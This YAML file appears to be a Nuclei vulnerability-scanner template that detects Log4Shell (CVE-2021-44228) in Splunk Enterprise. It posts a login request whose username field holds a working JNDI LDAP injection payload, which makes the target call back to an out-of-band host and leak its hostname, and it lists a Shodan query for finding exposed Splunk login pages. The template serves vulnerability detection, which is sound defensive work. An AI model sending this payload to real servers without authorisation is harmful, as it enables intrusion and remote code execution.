nuclei-templates/http/vulnerabilities/other/splunk-enterprise-log4j-rce...

71 lines
2.3 KiB
YAML

id: splunk-enterprise-log4j-rce
info:
name: Splunk Enterprise - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
Splunk Enterprise is susceptible to Log4j JNDI remote code execution. Splunk Enterprise enables you to search, analyze and visualize your data to quickly act on insights from across your technology landscape.
reference:
- https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.title:"Login - Splunk"
product: splunk
vendor: splunk
tags: cve,cve2021,rce,jndi,log4j,splunk,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
- |
POST /en-US/account/login HTTP/1.1
Host: {{Hostname}}
Accept: text/javascript, text/html, application/xml, text/xml, /
X-Requested-With: XMLHttpRequest
Origin: {{RootURL}}
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
cval={{unix_time()}}&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}&return_to=%2Fen-US%2F
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
extractors:
- type: kval
kval:
- interactsh_ip
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- type: regex
part: interactsh_request
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
# digest: 490a004630440220710929465f8a77ba76bd194093d158488b54954b4cbbeb2494fa76f18edd861802203d0bc07faaf77ec5f71f05b8124d0e477e5b07f9b9d3c43e9ea2f23662f65e23:922c64590222798bb761d5b6d8e72950